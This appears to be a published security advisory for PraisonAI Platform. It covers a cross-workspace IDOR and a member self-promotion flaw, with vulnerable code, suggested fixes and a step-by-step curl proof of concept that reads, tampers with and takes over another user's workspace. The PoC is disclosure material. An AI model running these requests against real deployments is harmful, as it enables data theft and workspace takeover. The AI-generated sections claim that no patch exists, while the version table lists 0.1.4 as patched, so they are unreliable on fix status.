PraisonAI has Cross-Workspace IDOR and Privilege Escalation via Platform API
Description
Summary
The PraisonAI Platform API has two authorization failures that together break workspace isolation. The service layer for issues and projects performs global primary-key lookups without checking workspace ownership, so any authenticated user can read, modify, and delete resources in any workspace just by swapping UUIDs in their API requests. On top of that, every member management endpoint (add, update role, remove) only requires min_role="member", which lets any workspace member promote themselves to owner and kick out the original owner. A low-privilege member of one workspace can steal data from every other workspace and take over any workspace they belong to.
Both issues come from the same gap: the route layer pulls workspace_id from the URL and verifies membership, but the service layer ignores the workspace scope for resource lookups and ignores the caller's role level for member operations. The require_workspace_member() dependency does its job correctly. The problem is that the service layer doesn't use the information it provides.
Details
Part 1: Cross-Workspace IDOR (Issues and Projects)
Vulnerable Files: - praisonai_platform/services/issue_service.py - praisonai_platform/services/project_service.py - praisonai_platform/api/routes/issues.py - praisonai_platform/api/routes/projects.py
There is a consistent split between the route layer and the service layer. Routes pull workspace_id from the URL and verify membership:
GET /api/v1/workspaces/{workspace_id}/issues/{issue_id}
^^^^^^^^^^^^^^
require_workspace_member() checks this
But the service methods these routes call perform global lookups that ignore workspace_id entirely:
IssueService.get(), line 72:
async def get(self, issue_id: str) -> Optional[Issue]:
"""Get issue by ID."""
return await self._session.get(Issue, issue_id)
ProjectService.get(), line 47:
async def get(self, project_id: str) -> Optional[Project]:
"""Get project by ID."""
return await self._session.get(Project, project_id)
Both use session.get(Model, pk), which is a global lookup by primary key with no WHERE workspace_id = ? filter.
Compare that with the properly scoped list_for_workspace() methods in the same files:
IssueService.list_for_workspace(), line 76:
async def list_for_workspace(self, workspace_id: str, ...) -> list[Issue]:
stmt = select(Issue).where(Issue.workspace_id == workspace_id)
# ... properly scoped
The listing is scoped correctly. The get, update, and delete methods are not. Since update() and delete() in both services call self.get() internally, the workspace bypass cascades through all write operations too.
Route that discards workspace_id, issues.py line 82:
@router.get("/{issue_id}", response_model=IssueResponse)
async def get_issue(
workspace_id: str, # Extracted from URL
issue_id: str,
user: AuthIdentity = Depends(require_workspace_member), # Membership verified
session: AsyncSession = Depends(get_db),
):
svc = IssueService(session)
issue = await svc.get(issue_id) # workspace_id never passed to service
All affected operations:
| Service | Method | Line | Workspace scoped? | |---------|--------|------|-------------------| | IssueService | get() | 72 | No, uses session.get(Issue, issue_id) | | IssueService | update() | 97 | No, calls self.get(issue_id) | | IssueService | delete() | 150 | No, calls self.get(issue_id) | | IssueService | list_for_workspace() | 76 | Yes, filters by workspace_id | | ProjectService | get() | 47 | No, uses session.get(Project, project_id) | | ProjectService | update() | 62 | No, calls self.get(project_id) | | ProjectService | delete() | 88 | No, calls self.get(project_id) | | ProjectService | get_stats() | 97 | No, only filters by project_id | | ProjectService | list_for_workspace() | 51 | Yes, filters by workspace_id |
Part 2: Workspace Takeover via Missing Role Enforcement
Vulnerable Files: - praisonai_platform/api/routes/workspaces.py (member management routes) - praisonai_platform/api/deps.py (authorization dependency) - praisonai_platform/services/member_service.py (role hierarchy implementation)
The authorization dependency supports role-based access:
require_workspace_member(), deps.py line 54:
async def require_workspace_member(
workspace_id: str,
user: AuthIdentity = Depends(get_current_user),
session: AsyncSession = Depends(get_db),
min_role: str = "member", # Accepts higher roles, but nobody passes them
) -> AuthIdentity:
member_svc = MemberService(session)
has = await member_svc.has_role(workspace_id, user.id, min_role)
if not has:
raise HTTPException(status_code=403, ...)
The has_role() method correctly implements role hierarchy:
MemberService.has_role(), member_service.py line 80:
async def has_role(self, workspace_id, user_id, required_role) -> bool:
"""Role hierarchy: owner > admin > member."""
member = await self.get(workspace_id, user_id)
if member is None:
return False
role_levels = {"owner": 3, "admin": 2, "member": 1}
user_level = role_levels.get(member.role, 0)
required_level = role_levels.get(required_role, 0)
return user_level >= required_level
This works correctly, but no route ever calls require_workspace_member with min_role="owner" or min_role="admin". Every member management route uses the default "member":
Self-promotion, workspaces.py line 115:
@router.patch("/{workspace_id}/members/{user_id}", response_model=MemberResponse)
async def update_member_role(
workspace_id: str,
user_id: str,
body: MemberUpdate,
user: AuthIdentity = Depends(require_workspace_member), # min_role="member"
session: AsyncSession = Depends(get_db),
):
member_svc = MemberService(session)
member = await member_svc.update_role(workspace_id, user_id, body.role)
# No check: is user modifying their own role? (self-promotion)
# No check: is body.role > caller's current role? (escalation)
# No check: is target a higher role than caller? (modifying superiors)
Owner removal, workspaces.py line 130:
@router.delete("/{workspace_id}/members/{user_id}", status_code=204)
async def remove_member(
workspace_id: str,
user_id: str,
user: AuthIdentity = Depends(require_workspace_member), # min_role="member"
...
):
member_svc = MemberService(session)
removed = await member_svc.remove(workspace_id, user_id)
# No check: is target a higher role than caller?
# No check: is this the last owner?
Three checks are missing from update_member_role: self-modification, upward escalation, and modifying superiors. Two checks are missing from remove_member: role hierarchy and last-owner protection.
PoC
Prerequisites: - A running PraisonAI Platform instance with default configuration - No special configuration required
Server setup:
cd /path/to/PraisonAI
pip install -e "src/praisonai-platform"
python -m uvicorn praisonai_platform.api.app:create_app \
--factory --host 127.0.0.1 --port 8000
Scenario: Full attack chain (IDOR + Privilege Escalation)
Step 1: Victim (CEO) creates workspace with sensitive data
BASE="http://127.0.0.1:8000/api/v1"
# Register CEO
VICTIM=$(curl -sfL -X POST "$BASE/auth/register" \
-H "Content-Type: application/json" \
-d '{"email":"ceo@targetcorp.com","password":"Secure123!","name":"CEO"}')
VICTIM_TOKEN=$(echo "$VICTIM" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")
VICTIM_ID=$(echo "$VICTIM" | python3 -c "import sys,json; print(json.load(sys.stdin)['user']['id'])")
# CEO creates workspace with confidential issue
VICTIM_WS=$(curl -sfL -X POST "$BASE/workspaces/" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $VICTIM_TOKEN" \
-d '{"name":"Executive Board"}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")
ISSUE_ID=$(curl -sfL -X POST "$BASE/workspaces/$VICTIM_WS/issues/" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $VICTIM_TOKEN" \
-d '{"title":"M&A Target List","description":"Acquiring CompanyX for $2B. Board approved. Do not disclose."}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")
echo "Victim workspace: $VICTIM_WS"
echo "Secret issue: $ISSUE_ID"
Step 2: Attacker registers and creates their own workspace
ATTACKER=$(curl -sfL -X POST "$BASE/auth/register" \
-H "Content-Type: application/json" \
-d '{"email":"attacker@evil.com","password":"Evil123!","name":"Attacker"}')
ATK_TOKEN=$(echo "$ATTACKER" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")
ATK_ID=$(echo "$ATTACKER" | python3 -c "import sys,json; print(json.load(sys.stdin)['user']['id'])")
ATK_WS=$(curl -sfL -X POST "$BASE/workspaces/" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $ATK_TOKEN" \
-d '{"name":"Attacker WS"}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['id'])")
Step 3: IDOR - Attacker reads victim's confidential issue through their own workspace
curl -sfL "$BASE/workspaces/$ATK_WS/issues/$ISSUE_ID" \
-H "Authorization: Bearer $ATK_TOKEN"
Observed output (HTTP 200):
{
"id": "<ISSUE_ID>",
"workspace_id": "<VICTIM_WS>",
"title": "M&A Target List",
"description": "Acquiring CompanyX for $2B. Board approved. Do not disclose.",
"status": "backlog"
}
The response contains the victim's workspace_id, which is different from the workspace in the request URL. The request was scoped to $ATK_WS but returned data from $VICTIM_WS.
Step 4: IDOR - Attacker modifies victim's issue
curl -sfL -X PATCH "$BASE/workspaces/$ATK_WS/issues/$ISSUE_ID" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $ATK_TOKEN" \
-d '{"title":"TAMPERED - M&A Target List"}'
Observed output (HTTP 200): Title updated across workspace boundary.
Step 5: Privilege escalation - CEO adds attacker as member (simulating invite)
curl -sfL -X POST "$BASE/workspaces/$VICTIM_WS/members/" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $VICTIM_TOKEN" \
-d "{\"user_id\":\"$ATK_ID\",\"role\":\"member\"}" > /dev/null
Step 6: Privilege escalation - Member promotes self to owner
PROMO=$(curl -sfL -X PATCH "$BASE/workspaces/$VICTIM_WS/members/$ATK_ID" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $ATK_TOKEN" \
-d '{"role":"owner"}')
echo "$PROMO" | python3 -c "import sys,json; d=json.load(sys.stdin); print(f'Role: {d[\"role\"]}')"
Observed output:
Role: owner
The member used their own member-level token to promote themselves to owner.
Step 7: Privilege escalation - Attacker removes original owner
curl -sLo /dev/null -w "HTTP %{http_code}" -X DELETE \
"$BASE/workspaces/$VICTIM_WS/members/$VICTIM_ID" \
-H "Authorization: Bearer $ATK_TOKEN"
Observed output: HTTP 204 - CEO removed from their own workspace.
Step 8: Verify - Attacker is sole owner
curl -sfL "$BASE/workspaces/$VICTIM_WS/members/" \
-H "Authorization: Bearer $ATK_TOKEN"
Observed output:
[
{
"workspace_id": "<VICTIM_WS>",
"user_id": "<ATK_ID>",
"role": "owner"
}
]
The CEO is locked out. The attacker is now the sole owner of "Executive Board" and all its data.
Impact
- Complete multi-tenant data breach: Any authenticated user can read every issue and project across all workspaces by substituting resource UUIDs. The URL structure (
/workspaces/{workspace_id}/...) implies tenant isolation but provides none. - Cross-workspace data tampering: An attacker can modify issue titles, descriptions, statuses, assignments, and project fields across workspace boundaries.
- Cross-workspace data deletion: An attacker can delete issues and projects belonging to other workspaces.
- Workspace takeover from member role: Any member can self-promote to owner and remove all other owners, gaining sole control of the workspace and everything in it.
- No recovery mechanism: After takeover, the original owner cannot access or recover their workspace. There is no super-admin role, no audit-based rollback, and no last-owner protection.
- Chain amplifies impact: The IDOR does not require membership in the target workspace, only membership in any workspace. The privilege escalation turns that foothold into full ownership. Together, a user with a single member-level invite to any workspace can read all data platform-wide and take ownership of any workspace they are invited to.
---
Suggested
Fix
1. Scope all service get/update/delete methods to workspace_id
# issue_service.py, replace get() at line 72:
async def get(self, issue_id: str, workspace_id: str) -> Optional[Issue]:
"""Get issue by ID, scoped to workspace."""
issue = await self._session.get(Issue, issue_id)
if issue is None or issue.workspace_id != workspace_id:
return None
return issue
# Apply the same pattern to update(), delete(), and all ProjectService methods
2. Pass workspace_id from routes to services
# issues.py, fix get_issue at line 82:
issue = await svc.get(issue_id, workspace_id) # Now workspace-scoped
3. Require owner role for member management and add escalation guards
# workspaces.py, fix update_member_role:
user: AuthIdentity = Depends(
lambda **kw: require_workspace_member(**kw, min_role="owner")
)
# Add self-modification and last-owner guards:
if user_id == user.id:
raise HTTPException(403, "Cannot change your own role")
# Fix remove_member:
target = await member_svc.get(workspace_id, user_id)
if target and target.role == "owner":
owners = [m for m in await member_svc.list_members(workspace_id) if m.role == "owner"]
if len(owners) <= 1:
raise HTTPException(403, "Cannot remove the last owner")
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PraisonAI Platform API fails to enforce workspace ownership in service layer, allowing cross-workspace IDOR and privilege escalation.
Vulnerability
The PraisonAI Platform API suffers from two authorization failures that together break workspace isolation. The service layer for issues and projects performs global primary-key lookups without checking workspace ownership, allowing any authenticated user to read, modify, and delete resources in any workspace simply by swapping UUIDs in API requests [1]. Additionally, all member management endpoints (add, update role, remove) only require min_role="member", enabling any workspace member to promote themselves to owner and remove the original owner [2]. These issues affect all versions prior to the fix.
Exploitation
An attacker needs only a valid authenticated session. By crafting API requests with arbitrary workspace and resource UUIDs, they can access issues and projects from any workspace without authorization checks [1]. For privilege escalation, any workspace member can call the member management endpoints to change their own role to owner, then remove other members, effectively taking over the workspace [2].
Impact
Successful exploitation leads to complete compromise of workspace isolation. An attacker can steal sensitive data (issues, projects) from all workspaces they can guess or enumerate UUIDs for, and can take full control of any workspace they belong to by escalating their role to owner [1][2].
Mitigation
Not yet disclosed in the available references. The vendor has been informed via the GitHub Advisory Database [1] and the project's security advisory [2], but no fix or workaround has been published as of the advisory date.
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
praisonai-platformPyPI | < 0.1.4 | 0.1.4 |
Affected products
2Patches
18b72cec167ecMerge pull request #168 from MervinPraison/develop
6 files changed · +25 −18
Dockerfile+1 −1 modified@@ -1,6 +1,6 @@ FROM python:3.11-slim WORKDIR /app COPY . . -RUN pip install flask praisonai==0.1.2 gunicorn markdown +RUN pip install flask praisonai==0.1.3 gunicorn markdown EXPOSE 8080 CMD ["gunicorn", "-b", "0.0.0.0:8080", "api:app"]
docs/api/praisonai/deploy.html+1 −1 modified@@ -110,7 +110,7 @@ <h2 id="raises">Raises</h2> file.write("FROM python:3.11-slim\n") file.write("WORKDIR /app\n") file.write("COPY . .\n") - file.write("RUN pip install flask praisonai==0.1.2 gunicorn markdown\n") + file.write("RUN pip install flask praisonai==0.1.3 gunicorn markdown\n") file.write("EXPOSE 8080\n") file.write('CMD ["gunicorn", "-b", "0.0.0.0:8080", "api:app"]\n')
praisonai/deploy.py+1 −1 modified@@ -56,7 +56,7 @@ def create_dockerfile(self): file.write("FROM python:3.11-slim\n") file.write("WORKDIR /app\n") file.write("COPY . .\n") - file.write("RUN pip install flask praisonai==0.1.2 gunicorn markdown\n") + file.write("RUN pip install flask praisonai==0.1.3 gunicorn markdown\n") file.write("EXPOSE 8080\n") file.write('CMD ["gunicorn", "-b", "0.0.0.0:8080", "api:app"]\n')
praisonai.rb+1 −1 modified@@ -3,7 +3,7 @@ class Praisonai < Formula desc "AI tools for various AI applications" homepage "https://github.com/MervinPraison/PraisonAI" - url "https://github.com/MervinPraison/PraisonAI/archive/refs/tags/0.1.2.tar.gz" + url "https://github.com/MervinPraison/PraisonAI/archive/refs/tags/0.1.3.tar.gz" sha256 "1828fb9227d10f991522c3f24f061943a254b667196b40b1a3e4a54a8d30ce32" # Replace with actual SHA256 checksum license "MIT"
praisonai/ui/realtime.py+20 −13 modified@@ -6,7 +6,6 @@ from openai import AsyncOpenAI import chainlit as cl -from chainlit.logger import logger from chainlit.input_widget import TextInput from chainlit.types import ThreadDict @@ -16,6 +15,25 @@ import chainlit.data as cl_data from literalai.helper import utc_now import json +import logging +import importlib.util +from importlib import import_module +from pathlib import Path + +# Set up logging +logger = logging.getLogger(__name__) +log_level = os.getenv("LOGLEVEL", "INFO").upper() +logger.handlers = [] + +# Set up logging to console +console_handler = logging.StreamHandler() +console_handler.setLevel(log_level) +console_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') +console_handler.setFormatter(console_formatter) +logger.addHandler(console_handler) + +# Set the logging level for the logger +logger.setLevel(log_level) # Set up CHAINLIT_AUTH_SECRET CHAINLIT_AUTH_SECRET = os.getenv("CHAINLIT_AUTH_SECRET") @@ -144,19 +162,8 @@ def load_setting(key: str) -> str: client = AsyncOpenAI() -# Add these new imports and code -import importlib.util -import logging -from importlib import import_module -from pathlib import Path - -# Set up logging -logging.basicConfig(level=logging.INFO) -logger = logging.getLogger(__name__) - # Try to import tools from the root directory -root_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) -tools_path = os.path.join(root_dir, 'tools.py') +tools_path = os.path.join(os.getcwd(), 'tools.py') logger.info(f"Tools path: {tools_path}") def import_tools_from_file(file_path):
pyproject.toml+1 −1 modified@@ -1,6 +1,6 @@ [tool.poetry] name = "PraisonAI" -version = "0.1.2" +version = "0.1.3" description = "PraisonAI application combines AutoGen and CrewAI or similar frameworks into a low-code solution for building and managing multi-agent LLM systems, focusing on simplicity, customization, and efficient human-agent collaboration." authors = ["Mervin Praison"] license = ""
Vulnerability mechanics
Root cause
"The service layer performs global primary-key lookups without filtering by workspace_id, and the member-management endpoints never enforce a minimum role above 'member'."
Attack vector
An attacker who is authenticated (any valid user) can read, modify, or delete issues and projects in any workspace by supplying the target resource UUID in a request scoped to their own workspace, because the service layer performs global lookups without a `workspace_id` filter [ref_id=1]. Separately, any workspace member can promote themselves to owner and remove the original owner because the member-management routes never pass `min_role="owner"` to the authorization dependency, and they lack guards against self-promotion or last-owner removal [ref_id=1]. Together, a low-privilege member of one workspace can exfiltrate data from all workspaces and take full control of any workspace they belong to.
Affected code
The vulnerability spans two layers. In the service layer, `praisonai_platform/services/issue_service.py` and `praisonai_platform/services/project_service.py` perform global primary-key lookups via `session.get(Model, pk)` without filtering by `workspace_id`. In the route layer, `praisonai_platform/api/routes/issues.py` and `praisonai_platform/api/routes/projects.py` extract `workspace_id` from the URL but never pass it to the service methods. For the privilege-escalation part, `praisonai_platform/api/routes/workspaces.py` uses the default `min_role="member"` on every member-management endpoint, and `praisonai_platform/api/deps.py` defines `require_workspace_member()` with a default `min_role="member"` that callers never override.
What the fix does
The advisory's suggested fix scopes every `get()`, `update()`, and `delete()` method in `IssueService` and `ProjectService` to accept and verify `workspace_id`, and passes that parameter from the route layer. For member management, it requires `min_role="owner"` on the authorization dependency and adds explicit guards against self-promotion and removal of the last owner. No patch has been published in the repository; the provided commit (`patch_id=3131090`) only bumps the version number and adjusts logging paths, and does not address the authorization flaws.
Preconditions
- authAttacker must be an authenticated user of the PraisonAI Platform (any valid account).
- inputFor the IDOR, the attacker only needs to know or guess the UUID of a target issue or project.
- authFor the privilege escalation, the attacker must be a member of the target workspace (any role).
- networkNo special configuration or network position is required; the API is reachable over HTTP.
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.